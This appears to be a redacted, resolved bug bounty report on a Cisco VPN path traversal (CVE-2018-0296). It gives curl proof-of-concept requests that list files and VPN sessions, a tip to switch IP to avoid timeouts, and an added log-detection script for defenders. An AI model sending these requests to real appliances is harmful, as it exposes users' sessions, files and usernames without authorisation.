[CVE-2018-0296] Cisco VPN path traversal on the https://███ (████████████████)
Medium
Vulnerability Details
## Description
I discovered a previously unidentified instance, https://█████ (█████████████), in the ██████ network that is vulnerable to CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296).
## POC
```
curl -i -k "https://███/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is
```
█████
We can disclose user sessions by querying /sessions:
```
curl -i -k "https://███████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
## Suggested fix
Updating to the latest version should fix the issue. A fixed version should return a 404 "File not found" error.
Example request against a patched version:
```
curl -i -k "https://█████.████.█████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is
```
## Notes
If you experience a request timeout when reproducing, try changing your IP/VPN.
## Impact
Path traversal that can allow an unauthenticated attacker to disclose sensitive information such as VPN sessions, files, and usernames. Under some conditions it is also possible to cause a DoS.
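For defenders, the request shape in the PoC above is easy to spot in web-server logs. The following is an added example (not part of the original report) that decodes each request target, resolves the `..` segments and flags requests that traverse from `+CSCOU+` into `+CSCOE+/files`; the log format and sample lines are constructed for illustration, and a 404 on such a request is consistent with the patched behaviour described in the suggested fix.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (common access-log layout); not real traffic.
SAMPLE_LOGS = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /+CSCOU+/%2e%2e/+CSCOE+/files/file_list.json HTTP/1.1" 404 120',
    '192.0.2.9 - - [01/Jan/2024:10:00:04 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 8000',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_traversal(target):
    """True if the request target uses '..' to reach +CSCOE+/files.

    Percent-encoding is decoded first so that %2e%2e is treated like '..'.
    (unquote leaves '+' alone, so the +CSCOU+/+CSCOE+ markers survive.)
    """
    decoded = unquote(urlsplit(target).path)
    has_dotdot = ".." in decoded.split("/")
    resolved = normpath(decoded)          # collapses the '..' segments
    return has_dotdot and resolved.startswith("/+CSCOE+/files/")


def detect(lines):
    """Return one finding per matching log line with the fields an analyst needs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_traversal(m["target"]):
            continue
        hits.append({
            "ip": m["ip"],
            "query": urlsplit(m["target"]).query,  # e.g. path=/sessions
            "status": int(m["status"]),
            # A 200 suggests the device served the listing; a 404 matches patched behaviour.
            "likely_success": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOGS):
        print(hit)
```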
Report Stats
- Report ID: 695427
- State: Closed
- Substate: resolved
- Upvotes: 14